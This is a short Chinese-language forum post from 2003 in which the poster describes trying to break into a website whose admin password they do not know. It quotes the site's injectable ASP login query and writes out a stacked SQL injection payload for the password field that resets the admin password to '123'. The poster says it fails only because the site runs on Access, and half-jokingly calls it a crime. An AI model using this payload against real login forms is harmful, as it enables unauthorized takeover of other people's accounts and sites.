|
6#
楼主 |
发表于 2003-1-16 22:33:00
|
只看该作者
好的。
我想进入一个站点,我不知道密码。我想修改它的密码。
站点提交的是用户名和密码两部分。我知道用户名是admin,但不知道密码。
它在ASP中的SQL语句是这样的:
Select * from user Where name='" & userName & "' and password='" & password & "'"
根据返回的记录有无来判断是否是合法用户
如果变成这个语句,在SQL Server中将修改admin的密码为123,下次我可以用这个帐号了
Select * from user Where name='admin' and password='';update user set password='123'
在提交时输入用户名为admin
密码为';update user set password='123
则实现了上述功能,即修改了admin的密码。
因为SQL Server可以同时执行多个SQL语句。
但Access不行,因为这个站点的数据库是Access的。
不好意思,把我的“犯罪”说出来了。
|
|